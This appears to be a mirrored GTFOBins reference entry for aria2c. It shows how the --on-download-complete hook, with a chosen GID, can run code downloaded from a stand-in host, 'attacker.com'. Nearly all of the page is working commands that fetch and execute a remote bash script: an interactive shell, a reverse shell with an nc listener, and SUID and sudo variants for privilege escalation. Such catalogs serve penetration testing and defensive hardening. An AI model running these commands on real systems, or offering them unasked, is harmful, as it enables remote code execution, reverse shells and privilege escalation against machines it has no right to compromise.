GTFOBins.github.io/aria2c.md at 214f7786c0451c3a160a4e35343e5af66ab58a9b

mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-07-19 00:45:12 +02:00

HugoDelval 214f7786c0 Add aria2c

Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit

2018-09-07 13:34:00 +02:00

functions

execute-interactive

reverse-shell-interactive

suid-enabled

sudo-enabled

description
By default the ``--on-download-complete`` option execute a given binary with 3 parameters: https://aria2.github.io/manual/en/html/aria2c.html?highlight=download%20complete#event-hook We can control the first one (GID) which leads to a command execution

code
aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains a shell script

description
Run ``nc -lvp 12345`` on the attacker box to receive the shell.

code
aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains the reverse shell payload (in bash)

code
./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa

code
sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa